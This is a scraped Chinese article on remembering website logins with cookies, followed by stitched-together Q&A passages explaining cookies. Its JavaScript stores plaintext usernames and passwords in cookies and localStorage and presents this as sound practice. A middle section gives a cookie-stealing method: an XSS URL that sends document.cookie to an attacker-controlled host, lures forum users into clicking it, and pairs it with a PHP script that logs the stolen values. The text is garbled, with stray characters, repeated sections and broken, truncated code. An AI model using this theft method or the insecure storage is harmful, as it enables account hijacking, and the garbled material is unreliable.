在現(xiàn)如今的互聯(lián)網(wǎng)時代，我們幾乎每天都要登錄各種網(wǎng)站，這無疑給我們的生活帶來了很大的便利。但是，頻繁的登錄也會給我們的體驗帶來不必要的繁瑣。因此，通過實現(xiàn)網(wǎng)站記住登錄狀態(tài)，讓用戶可以在下一次訪問網(wǎng)站時無需再次登錄，不僅可以增強用戶體驗，還可以提高網(wǎng)站的粘性。本文將介紹如何將cookie存入本地數(shù)據(jù)庫，實現(xiàn)網(wǎng)站記住登錄狀態(tài)。

創(chuàng)新互聯(lián)公司擁有10年的建站服務經(jīng)驗，在此期間，我們發(fā)現(xiàn)較多的客戶在挑選建站服務商前都非常的猶豫。主要問題集中：在無法預知自己的網(wǎng)站呈現(xiàn)的效果是什么樣的？也無法判斷選擇的服務商設計出來的網(wǎng)頁效果自己是否會滿意？創(chuàng)新互聯(lián)公司業(yè)務涵蓋了互聯(lián)網(wǎng)平臺網(wǎng)站建設、移動平臺網(wǎng)站制作、網(wǎng)絡推廣、定制網(wǎng)站等服務。創(chuàng)新互聯(lián)公司網(wǎng)站開發(fā)公司本著不拘一格的網(wǎng)站視覺設計和網(wǎng)站開發(fā)技術相結合，為企業(yè)做網(wǎng)站提供成熟的網(wǎng)站設計方案。

一、什么是Cookie？

Cookie是HTTP協(xié)議中的一種機制，它是由服務器發(fā)給客戶端的小數(shù)據(jù)文件，存儲在本地，用于記錄用戶在網(wǎng)站上的訪問狀態(tài)、身份識別、購物車等信息。隨著網(wǎng)頁的載入，瀏覽器會將存儲在本地的Cookie發(fā)送給服務器，從而實現(xiàn)對用戶的識別。

Cookie以鍵值對的形式存在，通常包含如下幾個屬性：名稱、值、到期時間、路徑、域、安全標志等。其中，名稱和值是必須存在的屬性，其余幾個屬性都是可選的。

二、Cookie在實現(xiàn)網(wǎng)站記住登錄狀態(tài)中的應用

在實現(xiàn)網(wǎng)站記住登錄狀態(tài)中，我們需要用到Cookie的持久化存儲。Cookie的持久化存儲是指Cookie在瀏覽器關閉后依舊保留，直到到期時間到達才會被刪除。對于持久化存儲，我們可以通過設置Cookie的到期時間，將其存儲在本地，從而實現(xiàn)下次用戶訪問時無需再次登錄。

在使用Cookie實現(xiàn)網(wǎng)站記住登錄狀態(tài)時，需要將用戶的登錄信息存儲在Cookie中，并將其存儲至本地數(shù)據(jù)庫中。具體步驟如下：

1. 獲取用戶登錄信息并生成Cookie

當用戶登錄成功后，我們需要獲取用戶的登錄信息（例如：用戶名、密碼、用戶id等信息），并構造一個包含這些信息的Cookie。下面是一個構造Cookie的例子：

“`

var expireDate = new Date();

expireDate.setDate(expireDate.getDate() + 1); // 設置Cookie的到期時間為一天后

document.cookie = ‘username=’ + encodeURIComponent(username) + ‘; expiresIn=’ + expireDate.toUTCString() + ‘; path=/;’;

document.cookie = ‘password=’ + encodeURIComponent(password) + ‘; expiresIn=’ + expireDate.toUTCString() + ‘; path=/;’;

“`

在上面的代碼中，我們創(chuàng)建了一個Javascript中的Date對象，將其設置為Cookie到期的時間。然后，我們通過document.cookie生成Cookie，將其存儲在本地，同時指定path屬性為’/’，表示所有的網(wǎng)頁都可以訪問該Cookie。

2. 存儲Cookie到本地數(shù)據(jù)庫

接下來，我們需要將Cookie存儲到本地數(shù)據(jù)庫中，以便下次用戶訪問時可以直接讀取Cookie。這里，我們可以使用Web Storage API中的localStorage或sessionStorage，將Cookie存儲到本地數(shù)據(jù)庫中。下面是一個使用localStorage存儲Cookie的例子：

“`

localStorage.setItem(‘username’, username);

localStorage.setItem(‘password’, password);

localStorage.setItem(‘expiresIn’, expireDate.toUTCString());

“`

在上面的代碼中，我們使用localStorage.setItem()方法將Cookie信息存儲到本地數(shù)據(jù)庫中。具體來說，我們將用戶名、密碼和到期時間分別存儲在localStorage中。

3. 讀取本地數(shù)據(jù)庫中的Cookie

在下一次用戶訪問網(wǎng)站時，我們需要讀取本地數(shù)據(jù)庫中存儲的Cookie，并將其發(fā)送給服務器認證用戶身份。下面是一個讀取localStorage中Cookie的例子：

“`

var username = localStorage.getItem(‘username’);

var password = localStorage.getItem(‘password’);

var expiresIn = localStorage.getItem(‘expiresIn’);

var now = new Date();

if (now

// 用戶登錄狀態(tài)仍有效，可以直接發(fā)送Cookie給服務器

document.cookie = ‘username=’ + encodeURIComponent(username) + ‘; path=/;’;

document.cookie = ‘password=’ + encodeURIComponent(password) + ‘; path=/;’;

}

“`

在上面的代碼中，我們通過localStorage.getItem()方法讀取localStorage中存儲的信息，得到用戶名、密碼和到期時間。如果當前時間仍舊在到期時間之前，說明用戶的登錄狀態(tài)仍舊有效，我們就可以直接發(fā)送Cookie給服務器。

4. 刪除本地數(shù)據(jù)庫中的Cookie

當用戶退出登錄后，我們需要刪除本地數(shù)據(jù)庫中存儲的Cookie。下面是一個使用localStorage刪除Cookie的例子：

“`

localStorage.removeItem(‘username’);

localStorage.removeItem(‘password’);

localStorage.removeItem(‘expiresIn’);

“`

在上面的代碼中，我們通過localStorage.removeItem()方法刪除localStorage中存儲的用戶名、密碼和到期時間。

三、

通過將Cookie存儲到本地數(shù)據(jù)庫中，我們可以實現(xiàn)網(wǎng)站記住登錄狀態(tài)的功能。這不僅可以提高用戶體驗，還可以增強網(wǎng)站的粘性。需要注意的是，在使用Cookie存儲用戶信息時，我們需要加密用戶信息，以保證用戶信息的安全性。另外，為防止惡意攻擊，我們需要設置Cookie的過期時間，并且在每次訪問時檢查Cookie的到期時間，判斷用戶的登錄狀態(tài)是否有效。

相關問題拓展閱讀：

• cookie里面保存的什么內容，占空間大嗎？能否清楚
• cookie是什么意思？
• 安卓cookie，cookie是什么？cookie是什么

cookie里面保存的什么內容，占空間大嗎？能否清楚

就是你瀏覽網(wǎng)頁的內容及一些你登錄論壇什么的密碼沒巧胡的內容，主寬知要是為了方面下一次瀏覽該網(wǎng)頁加載速度快些，建議經(jīng)常清楚，時間久了會占很大空間，再說枯攔也不是很安全。

另請參閱Cookies。

Cookie，有時也用其復數(shù)形式Cookies，指某些網(wǎng)站為了辨別用戶身份而儲存在用戶本地終端上的數(shù)據(jù)（通常經(jīng)過加密）。定義于RFC2109。它是網(wǎng)景公司的前雇員Lou Montulli在1993年3月的發(fā)明。用途

服務器可以利用Cookies包含信息的任意性來篩選并經(jīng)常性維護這些信息，以判斷在HTTP傳輸中的狀態(tài)。Cookies最典型的應用是判定注冊用戶是否已經(jīng)登錄網(wǎng)站，用戶可能會得到提示，是否在下一次進入此網(wǎng)站時保留用戶信息以便簡化登錄手續(xù)，這些都是Cookies的功用。另一個重要應用場合是“購物車”之類處理。用戶可能會在一段時間內在同一家網(wǎng)站的不同頁面中選擇不同的商品，這些信息都會寫入Cookies，以便在最后付款孝喚時提取信息。

使用和禁用Cookie

用戶可以改變?yōu)g覽器的設置，以使用或者禁用Cookies。

微軟 Internet Explorer

工具 > Internet選項 > 隱私頁

調節(jié)滑塊或者點擊“高級”，進行設置.

Mozilla Firefox

工具 > 選項 > 隱私

(注: 在Linux版本中，可能會是如下操作：編輯 > 屬性 > 隱私 ， 而Mac則是：Firefox > 屬性 > 隱私)

設置Cookies選項

設定阻止/允許的各個域內Cookie

查看Cookies管理窗口，檢查現(xiàn)存Cookie信息，選擇刪除或者阻止它們

蘋果計算機 Safari

Safari > 預置 > 安全標簽

選擇以下的選項

總是 接受 Cookies

永不 接受 Cookies

接受 Cookies 僅從您瀏覽的站點 (例如，告胡不接受來自其它站點的廣告) 預設的選項.

您可以顯示所有駐留在您瀏覽器中的 cookies，也可隨時將它們之一刪除。

Konqueror

如果沒有設置cookie列表，請記住在域名前面加入“.”，例如.baidu.org，否則百度將不會讀取cookie(針對KDE 3.3)。生存周期

Cookie可以保持登錄信息到用戶下次與服務器的會話，換句話說，下次訪問同一網(wǎng)站時，用戶會發(fā)現(xiàn)不必輸入用戶名和密碼就已經(jīng)登錄了（當然，不排除用戶手工刪除Cookie）。而還有一些Cookie在用戶退出會話的時候就被刪除了，這樣可以有效保護個人隱私。識別功能

如果在一臺計算機中安裝多個瀏覽器，每個瀏覽器都會獨立的空間存放cookie。因為cookie中不但可以確認用戶，還能包含計算機和瀏覽器的信息，所以一個用戶用不同的瀏覽器登錄或者用不同的計算機登錄，都會得到不同的cookie信息，另一方面，對于在同一臺計算機上使用同一瀏覽器的多用戶群，cookie不會區(qū)分他們的身份，除非他們使用不同的用戶名登錄。

反對cookies者

一些人反對cookie在網(wǎng)絡中的應用，他們的理由如下：

識別不精確

參見上面的識別功能

隱私，安全和廣告

Cookies在某種程度上說已經(jīng)嚴重危及用戶的隱私和安全。其中的一種方法是：一些公司的高層人員為了某種目的（譬如市場調研）而訪問了從未去過的網(wǎng)站（通過搜索引擎查到的），而這些網(wǎng)站包含了一種叫做網(wǎng)頁臭蟲的圖片，該圖襪慎攔片透明，且只有一個象素大?。ㄒ员汶[藏），它們的作用是將所有訪問過此頁面的計算機寫入cookie。而后，電子商務網(wǎng)站將讀取這些cookie信息，并尋找寫入這些cookie的網(wǎng)站，隨即發(fā)送包含了針對這個網(wǎng)站的相關產品廣告的垃圾郵件給這些高級人員。

因為更具有針對性，使得這套系統(tǒng)行之有效，收到郵件的客戶或多或少表現(xiàn)出對產品的興趣。這些站點一旦寫入cookie并使其運作，就可以從電子商務網(wǎng)站那里獲得報酬，以維系網(wǎng)站的生存。

鑒于隱藏的危害性，瑞典已經(jīng)通過對cookie立法，要求利用cookie的網(wǎng)站必須說明cookie的屬性，并且指導用戶如何禁用cookie。偷竊Cookie和腳本攻擊

盡管cookie沒有病毒那么危險，但它仍包含了一些敏感信息：用戶名，計算機名，使用的瀏覽器和曾經(jīng)訪問的網(wǎng)站。用戶不希望這些內容泄漏出去，尤其是當其中還包含有私人信息的時候。

這并非危言聳聽，一種名為Cross site scripting的工具可以達到此目的。在受到Cross site scripting攻擊時，cookie盜賊和cookie毒藥將竊取內容。一旦cookie落入攻擊者手中，它將會重現(xiàn)其價值。

cookie盜賊：搜集用戶cookie并發(fā)給攻擊者的黑客。攻擊者將利用cookie信息通過合法手段進入用戶帳戶。

cookie毒藥：利用安全機制，攻擊者加入代碼從而改寫cookie內容，以便持續(xù)攻擊。Cookies的替代品

鑒于cookie的局限和反對者的聲音，有如下一些替代方法：

Brownie方案，是一項開放源代碼工程，由SourceForge發(fā)起。Brownie曾被用以共享在不同域中的接入，而cookies則被構想成單一域中的接入。這項方案已經(jīng)停止開發(fā)。

P，用以讓用戶獲得更多控制個人隱私權利的協(xié)議。在瀏覽網(wǎng)站時，它類似于cookie。

在與服務器傳輸數(shù)據(jù)時，通過在地址后面添加唯一查詢串，讓服務器識別是否合法用戶，也可以避免使用cookie。cookie的具體含義

cookie 歷來指就著牛奶一起吃的點心。然而，在因特網(wǎng)內，“cookie”這個字有了完全不同的意思。那么“cookie”到底是什么呢？“Cookie”是小量信息，由網(wǎng)絡服務器發(fā)送出來以存儲在網(wǎng)絡瀏覽器上，從而下次這位獨一無二的訪客又回到該網(wǎng)絡服務器時，可從該瀏覽器讀回此信息。這是很有用的，讓瀏覽器記住這位訪客的特定信息，如上次訪問的位置、花費的時間或用戶首選項（如樣式表）。Cookie 是個存儲在瀏覽器目錄的文本文件，當瀏覽器運行時，存儲在 RAM 中。一旦閣下從該網(wǎng)站或網(wǎng)絡服務器退出，Cookie 也可存儲在計算機的硬驅上。I3I.net的打算是，當訪客結束其瀏覽器對話時，即終止I3I.net的所有 cookie。

Cookie 有哪些用途？

Cookie 的用途之一是存儲用戶在特定網(wǎng)站上的密碼和 ID。另外，也用于存儲起始頁的首選項。在提供個人化查看的網(wǎng)站上，將要求閣下的網(wǎng)絡瀏覽器利用閣下計算機硬驅上的少量空間來儲存這些首選項。這樣，每次閣下登錄該網(wǎng)站時，閣下的瀏覽器將檢查閣下是否就該唯一的服務器有任何預先定義的首選項（cookie）。如果有的話，瀏覽器將此 cookie 隨閣下對網(wǎng)頁的請求一起發(fā)送給服務器。Microsoft 和 Netscape 使用 cookie 在其網(wǎng)站上創(chuàng)建個人起始頁。各家公司利用 cookie 的一般用途包括：在線定貨系統(tǒng)、網(wǎng)站個人化和網(wǎng)站跟蹤。

網(wǎng)站個人化是 cookie 最有益的用途之一。例如，當誰來到 CNN 網(wǎng)站，但并不想查看任何商務新聞。網(wǎng)站允許他將該項選為選項。從那時起（或者直到 cookie 逾期），他在訪問 CNN 網(wǎng)頁時將不會讀到商務新聞。

這些 Cookie 是如何起作用的？

文檔的 HTML 代碼中的命令行告訴瀏覽器設置某一名稱或數(shù)值的 cookie。以下是用來設置 cookie 腳本的一個普通實例。

Set-Cookie: name = VALUE;

expires = DATE;

path = PATH;

domain = DOMAIN_NAME;

那么安全性如何？HTTP Cookie 不能用來從閣下的硬驅上檢索個人數(shù)據(jù)、放置病毒、得到閣下的電子郵件地址或偷竊有關閣下身份的敏感信息；然而，HTTP Cookie 可用來跟蹤閣下在特定網(wǎng)站上的所到之處。不使用 cookie 就很難進行網(wǎng)站跟蹤。

至于其他一切與因特網(wǎng)有關的事，如同閣下所希望的那樣是匿名的。沒有網(wǎng)站知道閣下是誰，除非閣下自己透露給網(wǎng)站。同時，cookie 只是為了更好地了解使用模式并改進網(wǎng)站訪客的效率而采用的一個網(wǎng)站跟蹤統(tǒng)計手段而已。

如果網(wǎng)站設計師旨在使網(wǎng)頁能與訪客更具互動作用，或者若設計師計劃讓訪客自定義網(wǎng)站的外觀，則就需要使用 cookie。而且，如果閣下想要網(wǎng)站在某些情況下改變其外觀，cookie 則提供了一條快速、容易的途徑，讓閣下的 HTML 頁面按需要而改變。最新型的服務器使用 cookie 有助于數(shù)據(jù)庫的互動性，進而改進網(wǎng)站的整體互動性。

Cookie在英文中是小甜品的意思，而這個詞我們總能在瀏覽器中看到，食品怎么會跟瀏覽器扯上關系呢？在你瀏覽以前登陸過的網(wǎng)站時可能會在網(wǎng)頁中出現(xiàn)：你好XX，感覺很親切，就好像是吃了一個小甜品一樣。這其實是通過訪問你主機里邊的一個文件來實現(xiàn)的，因此這個文件也就被稱為了Cookie。想全面了解Cookie嗎？看看下文吧！

一.了解Cookie 適用對象：初級讀者

Cookie是當你瀏覽某網(wǎng)站時，網(wǎng)站存儲在你機器上的一個小文本文件，它記錄了你的用戶ID，密碼、瀏覽過的網(wǎng)頁、停留的時間等信息，當你再次來到該網(wǎng)站時，網(wǎng)站通過讀取Cookie，得知你的相關信息，就可以做出相應的動作，如在頁面顯示歡迎你的標語，或者讓你不用輸入ID、密碼就直接登錄等等。你可以在IE的“工具/Internet選項”的“常規(guī)”選項卡中，選擇“設置/查看文件”，查看所有保存到你電腦里的Cookie。這些文件通常是以user@domain格式命名的，user是你的本地用戶名，domain是所訪問的網(wǎng)站的域名。如果你使用NetsCape瀏覽器，則存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面，與IE不同的是，NETSCAPE是使用一個Cookie 文件記錄所有網(wǎng)站的Cookies。

為了保證上網(wǎng)安全我們需要對Cookie進行適當設置。打開“工具/Internet選項”中的“隱私”選項卡（注意該設置只在IE6.0中存在，其他版本IE可以在“工具/Internet選項”的“安全”標簽中單擊“自定義級別”按鈕，進行簡單調整），調整Cookie的安全級別。通常情況，可以將滑塊調整到“中高”或者“高”的位置。多數(shù)的論壇站點需要使用Cookie信息，如果你從來不去這些地方，可以將安全級調到“阻止所有Cookies”。如果只是為了禁止個別網(wǎng)站的Cookie，可以單擊“編輯”按鈕，將要屏蔽的網(wǎng)站添加到列表中。在“高級”按鈕選項中，你可以對之一方Cookie和第三方的Cookie進行設置，之一方Cookie是你正在瀏覽的網(wǎng)站的Cookie，第三方Cookie非正在瀏覽的網(wǎng)站發(fā)給你的Cookie，通常要對第三方Cookie選擇“拒絕”，如圖1。你如果需要保存Cookie，可以使用IE的“導入導出”功能，打開“文件/導入導出”，按提示操作即可。

Cookie中的內容大多數(shù)經(jīng)過了加密處理，因此在我們看來只是一些毫無意義的字母數(shù)字組合，只有服務器的CGI處理程序才知道它們真正的含義。通過一些軟件我們可以查看到更多的內容，使用Cookie Pal軟件查看到的Cookie信息，如圖2所示。它為我們提供了Server、Expires、Name、value等選項的內容。其中，Server是存儲Cookie的網(wǎng)站，Expires記錄了Cookie的時間和生命期，Name和value字段則是具體的數(shù)據(jù)

二、Cookie的傳遞流程 適用對象：中級讀者

當在瀏覽器地址欄中鍵入了一個Web站點的URL，瀏覽器會向該Web站點發(fā)送一個讀取網(wǎng)頁的請求，并將結果在顯示器上顯示。這時該網(wǎng)頁在你的電腦上尋找Amazon網(wǎng)站設置的Cookie文件，如果找到，瀏覽器會把Cookie文件中的數(shù)據(jù)連同前面輸入的URL一同發(fā)送到Amazon服務器。服務器收到Cookie數(shù)據(jù)，就會在他的數(shù)據(jù)庫中檢索你的ID，你的購物記錄、個人喜好等信息，并記錄下新的內容，增加到數(shù)據(jù)庫和Cookie文件中去。如果沒有檢測到Cookie或者你的Cookie信息與數(shù)據(jù)庫中的信息不符合，則說明你是之一次瀏覽該網(wǎng)站，服務器的CGI程序將為你創(chuàng)建新的ID信息，并保存到數(shù)據(jù)庫中。

Cookie是利用了網(wǎng)頁代碼中的HTTP頭信息進行傳遞的，瀏覽器的每一次網(wǎng)頁請求，都可以伴隨Cookie傳遞，例如，瀏覽器的打開或刷新網(wǎng)頁操作。服務器將Cookie添加到網(wǎng)頁的HTTP頭信息中，伴隨網(wǎng)頁數(shù)據(jù)傳回到你的瀏覽器，瀏覽器會根據(jù)你電腦中的Cookie設置選擇是否保存這些數(shù)據(jù)。如果瀏覽器不允許Cookie保存，則關掉瀏覽器后，這些數(shù)據(jù)就消失。Cookie在電腦上保存的時間是不一樣的，這些都是由服務器的設置不同決定得。Cookie有一個Expires（有效期）屬性，這個屬性決定了Cookie的保存時間，服務器可以通過設定Expires字段的數(shù)值，來改變Cookie的保存時間。如果不設置該屬性，那么Cookie只在瀏覽網(wǎng)頁期間有效，關閉瀏覽器，這些Cookie自動消失，絕大多數(shù)網(wǎng)站屬于這種情況。通常情況下，Cookie包含Server、Expires、Name、value這幾個字段，其中對服務器有用的只是Name和value字段，Expires等字段的內容僅僅是為了告訴瀏覽器如何處理這些Cookies。

三、Cookie的編程實現(xiàn) 適用對象：高級讀者

多數(shù)網(wǎng)頁編程語言都提供了對Cookie的支持。如javascript、VBScript、Delphi、ASP、SQL、PHP、C#等。在這些面向對象的編程語言中，對Cookie的編程利用基本上是相似的，大體過程為：先創(chuàng)建一個Cookie對象（Object），然后利用控制函數(shù)對Cookie進行賦值、讀取、寫入等操作。那么如何通過代碼來獲取其他用戶Cookie中的敏感信息？下面進行簡單的介紹。

該方法主要有兩步，首先要定位你需要收集Cookie的網(wǎng)站，并對其進行分析，并構造URL；然后編制收集Cookie的PHP代碼，并將其放到你可以控制的網(wǎng)站上，當不知情者單擊了你構造的URL后可以執(zhí)行該PHP代碼。下面我們看具體的實現(xiàn)過程。

1.分析并構造URL

首先打開我們要收集Cookie的網(wǎng)站，這里假設是

，登陸網(wǎng)站輸入用戶名“”（不含引號），對數(shù)據(jù)進行分析抓包，得到形如“

/txl/login/login….x=28&ok.y=6”的代碼，將“”更換為“”再試；如果執(zhí)行成功，就開始構造URL：“

\”%2Bdocuments.cookie)&passwd=&ok.x=28&ok.y=6″ target=”_blank”>

/txl/login/log ;… swd=&ok.x=28&ok.y=6”。其中

就是你能夠控制的某臺主機上的一個腳本。需要注意的是“%2B”為符號“+”的URL編碼，因為“+”將被作為空格處理。該URL就可以在論壇中發(fā)布，誘使別人點擊了。

2.編制PHP腳本

該腳本的作用就是收集Cookie文件，具體內容如下：

$info = getenv(“QUERY_STRING”;

if ($info) {

$fp = fopen(“info.txt”,”a”;

fwrite($fp,$info.”\n”;

fclose($fp);

}

header(“Location:

\”;

?>

四、Cookie的安全問題 適用對象：所有希望上網(wǎng)安全的讀者

1.Cookie欺騙

Cookie記錄著用戶的帳戶ID、密碼之類的信息，如果在網(wǎng)上傳遞，通常使用的是MD5方法加密。這樣經(jīng)過加密處理后的信息，即使被網(wǎng)絡上一些別有用心的人截獲，也看不懂，因為他看到的只是一些無意義的字母和數(shù)字。然而，現(xiàn)在遇到的問題是，截獲Cookie的人不需要知道這些字符串的含義，他們只要把別人的Cookie向服務器提交，并且能夠通過驗證，他們就可以冒充受害人的身份，登陸網(wǎng)站。這種方法叫做Cookie欺騙。Cookie欺騙實現(xiàn)的前提條件是服務器的驗證程序存在漏洞，并且冒充者要獲得被冒充的人的Cookie信息。目前網(wǎng)站的驗證程序要排除所有非法登錄是非常困難的，例如，編寫驗證程序使用的語言可能存在漏洞。而且要獲得別人Cookie是很容易的，用支持Cookie的語言編寫一小段代碼就可以實現(xiàn)（具體方法見三），只要把這段代碼放到網(wǎng)絡里，那么所有人的Cookie都能夠被收集。如果一個論壇允許HTML代碼或者允許使用Flash標簽就可以利用這些技術收集Cookie的代碼放到論壇里，然后給帖子取一個吸引人的主題，寫上有趣的內容，很快就可以收集到大量的Cookie。在論壇上，有許多人的密碼就被這種方法盜去的。至于如何防范，目前還沒有特效藥，我們也只能使用通常的防護方法，不要在論壇里使用重要的密碼，也不要使用IE自動保存密碼的功能，以及盡量不登陸不了解底細的網(wǎng)站。

2.Flash的代碼隱患

cookie是什么意思？

Cookie，有時也用其復數(shù)形式 Cookies，指某些網(wǎng)站為了辨別用戶身份、進行 session 跟蹤而儲存在用戶本地終端上的數(shù)據(jù)（通常經(jīng)過加密）。定義于 RFC2109 和 2965 中的都已廢棄，最新取代櫻源租的規(guī)范是 RFC6265 。（可以叫做瀏覽器緩存）。

擴展資料

基于 Internet的各種服務系統(tǒng)應運而生，建立商業(yè)站點或者功能比較完善的個人站點，常常需要記錄訪問者的一些信息；論壇作為 Internet發(fā)展的產物之一，在 Internet 中發(fā)揮著越來越重要的作用，是用戶獲取、交流、傳遞信息的主要場所之一，裂族論壇常常也需要記錄訪問者的一些基本信息（如身份識別號碼、密碼、用戶在 Web 站點購物的方式或用戶訪問該站點的次數(shù)）。目前公認的是，通過 Cookie 和 Session 技術來實現(xiàn)記錄訪問者的一些基本信息 。

Cookie 技術誕生以來，它就成了廣大網(wǎng)絡用戶和 Web 開發(fā)人員爭論的一個焦點。有一些網(wǎng)絡用戶，甚至包括一些資深的 Web 專家也對它的產生和推廣感到不滿，這并不是因為 Cookie 技術的功能太弱或其他技術性能上的原因，而是因為 Cookie 的使用脊兆對網(wǎng)絡用戶的隱私構成了危害。因為 Cookie 是由 Web 服務器保存在用戶瀏覽器上的小文本文件，它包含有關用戶的信息。

Cookie 技術產生源于 HTTP 協(xié)議在互聯(lián)網(wǎng)上的急速發(fā)展。隨著互聯(lián)網(wǎng)的深層次發(fā)展，帶寬等限制不存在了，人們需要更復雜的互聯(lián)網(wǎng)交互活動，就必須同服務器保持活動狀態(tài)。

于是，在瀏覽器發(fā)展初期，為了適應用戶的需求，技術上推出了各種保持 Web 瀏覽狀態(tài)的手段，其中就包括了 Cookie 技術。1993 年，網(wǎng)景公司雇員 Lou Montulli 為了讓用戶在訪問某網(wǎng)站時，進一步提高訪問速度，同時也為了進一步實現(xiàn)個人化網(wǎng)絡，發(fā)明了今天廣泛使用的 Cookie

參考資料：

百度百科-cookie

瀏覽器的Cookie是神數(shù)什么粗巧意思？為啥看見的廣告是我們搜索過的內巖瞎鍵容？

英文直接翻譯過來的意思呢就是小甜品 Cookie英文意指餅干，不過在電腦術語中它可不像餅干那么簡單。簡單的說，Cookie就是服務器暫存放在你計算機上的一筆資料，好讓服務器用來辨認你的計算機。當你在瀏覽網(wǎng)站的時候型族，Web服務器會先送一小小資料放在你的計算機上，Cookie 會幫你在網(wǎng)站上所打的文字或是一些選擇，都記錄下來。當下次你再光臨同一個網(wǎng)站，Web服務器會先看看有沒有它上次留下的Cookie資鉛輪料，有的話，就會依據(jù)Cookie里的內容來判斷使用者，送出特定的網(wǎng)頁內容給你。

Cookie的使用很普遍，許多提供個人化服務的網(wǎng)站，都是利用Cookie來辨認使用者，以方便送出使用者量身定做的內容卜激弊，像是Web接口的免費E-mail網(wǎng)站，都要用到 Cookie。Cookie中記載的資料相有限，Cookie是安全的。網(wǎng)站不可能經(jīng)由Cookie獲得你的E-mail地址或是其它私人資料，更沒有辦法透過Cookie來存取你的計算機。但是如果你實在不喜歡Web服務器亂丟餅干(Cookie)到你家，當然可以讓瀏覽器拒絕網(wǎng)站存放Cookie到你的計算機。只要在IE的“工具”菜單下選擇“Intertnet選項”的“安全”，按自定義級別，將Cookie部分設為關閉，按確定，關閉瀏覽器，再重新啟動瀏覽器即可。當你關閉Cookie之后，很多網(wǎng)站的個人化服務功能很可能也不能再使用了.

英文直接翻譯過來的意思呢就是小甜品 Cookie英文意指餅干，不過在電腦術語中它可不御皮像餅干那么簡單。簡單的說，Cookie就是服務器暫存放在你電腦上的一筆資料察拆漏，好讓服務器用來識別你的計算機。當你在瀏覽網(wǎng)站的時候，WEB服務器會先送一小小資料放在你的計算機上，Cookie會幫你在網(wǎng)站上所打的文字或是一些選擇，都記錄下來。當下次你再光臨同一個網(wǎng)站，WEB服務器會先看看有沒有它上次留下的Cookie資料，如果有的話，就會根據(jù)Cookie里的內容來判斷使用者，送出特定的網(wǎng)頁內容給你。Cookie的使用很普遍，許多有提供個人化服務的網(wǎng)站，都是利用Cookie來識別使用者，以方便送出使用者量身定做的內容，像是Web接口的免費Email網(wǎng)站，都要用到Cookie。

其實Cookie中記載的資料相當有限，網(wǎng)站不可能通過Cookie獲得你的Email地址或是其他私人資料。如果你想讓瀏覽器拒絕網(wǎng)站存放Cookie到你的計算機敗爛，可按”工具→Internet選項”，切換到”安全”標簽，選擇”自定義級別”，找到Cookie部分（如圖），全都設為關閉，按下”確定”按鈕后，再關閉瀏覽器即可。當你關閉Cookie之后，很多網(wǎng)站的個人化服務功能很可能也不能再使用了。

什么是cookie

cookie

歷來指就著牛奶一起吃的點心。然而，在因特網(wǎng)內，“cookie”這個字有了完全不同的意思。那么“cookie”到底是什么呢？“Cookie”是小量信息，鄭橡由網(wǎng)絡服務器發(fā)送出來以存儲在網(wǎng)絡瀏覽器上，從而下次這位獨一無二的訪客又回到該網(wǎng)絡服務器時，可從該瀏覽器讀回此信息。這是很有用的，讓瀏覽器記住這位訪客的特定信息，如上次訪問的位置、花費的時間或用戶首選項（如樣式表）。Cookie

是個存儲在瀏覽器目錄的文本文件，當瀏覽器運行時，存儲在

RAM

中。一旦閣下從該網(wǎng)站或網(wǎng)絡服務器退出，Cookie

也可存儲在計算機的硬驅上。I3I.net的打算是，當訪客結束其瀏覽器對話時，即終止I3I.net的所有

cookie。

Cookie

有哪些用途？

Cookie

的用途之一是存儲用戶在特定網(wǎng)站上的密碼和

ID。另外，也用于存儲起始頁的首選項。在提供個人化查看的網(wǎng)站上，將要求閣下的網(wǎng)絡瀏覽器利用閣下計算機硬驅上的少量空間來儲存這些首選項。這樣，每次閣下登錄該網(wǎng)站時，閣下的瀏覽器將檢查閣下是否就該唯一的服務器有任何預先定義的首選項（cookie）。如果有的話，瀏覽器將此

cookie

隨閣下對網(wǎng)頁的請求一起發(fā)送給服務器。Microsoft

和

Netscape

使用

cookie

在其網(wǎng)站上創(chuàng)建個人起始頁。各家公司利用

cookie

的一般用途包括：在線定貨系統(tǒng)、網(wǎng)站個人化和網(wǎng)站跟蹤。

網(wǎng)站個人化是

cookie

最有益的用途之一。例如，當誰來到

CNN

網(wǎng)站，但并不想查看任何商務新聞。網(wǎng)站允許他將該項選為選項。從那時起（或者直到

cookie

逾期），他在訪問

CNN

網(wǎng)頁時將不會讀到商務新聞。

這些

Cookie

是如何起作用的？

文檔的

HTML

代碼中的命令行告訴瀏覽器設置某一名稱或數(shù)值的

cookie。以下是用來設置

cookie

腳本的一個普通實例。

Set-Cookie:

name

=

VALUE;

expires

=

DATE;

path

=

PATH;

domain

=

DOMAIN_NAME;

那么安全性如何？HTTP

Cookie

不能用來從閣下的硬驅上檢索個人數(shù)據(jù)、放置病毒、得到閣下的電子郵件地址或偷竊有關閣下身份的敏感信息；然而，HTTP

Cookie

可用來跟蹤閣下在特定網(wǎng)站上的所到之處。不使用

cookie

就很難進行網(wǎng)站跟蹤。

至于其他一切與因特網(wǎng)畝叢殲有關的事，如同閣下所希望的那樣是匿名的。沒有網(wǎng)站知道閣下是誰，除非閣下自己透露給網(wǎng)站。同時，cookie

只是為了更好地了解使用模式并改進網(wǎng)站訪客的效率而采用的一個網(wǎng)站跟蹤統(tǒng)計手段而已。

如果網(wǎng)站設計師旨在使網(wǎng)頁能與訪客更迅沖具互動作用，或者若設計師計劃讓訪客自定義網(wǎng)站的外觀，則就需要使用

cookie。而且，如果閣下想要網(wǎng)站在某些情況下改變其外觀，cookie

則提供了一條快速、容易的途徑，讓閣下的

HTML

頁面按需要而改變。最新型的服務器使用

cookie

有助于數(shù)據(jù)庫的互動性，進而改進網(wǎng)站的整體互動性。

安卓cookie，cookie是什么？cookie是什么

瀏顫此覽器并洞薯的Cookie是什么意思絕者？

　　COOKIE是指你上網(wǎng)時候輸入的私密和訪問過的網(wǎng)絡的一個小，直接翻譯是甜餅。他一般在C盤主要是為了方便下次再訪問這些網(wǎng)頁.如果上網(wǎng)的防病措施…

　　Android如何使用讀寫cookie的方法

　　可以使用SharedPreferences或者SQLite來保存用戶并升信息

private static HashMap CookieContiner=new HashMap() ;

/**

* 保存Cookie

* @param resp

*/

public void SaveCookies(HttpResponse httpResponse)

{

Header headers = httpResponse.getHeaders(“Set-Cookie”);

String headerstr=headers.toString();

if (headers == null)

return;

for(int i=0;i1?keyPair.trim():””;

CookieContiner.put(key, value);

}

}

}

/**

* 增加Cookie

* @param request

*/

public void AddCookies(HttpPost request)

{

StringBuilder = new StringBuilder();

Iterator iter = CookieContiner.entrySet().iterator();

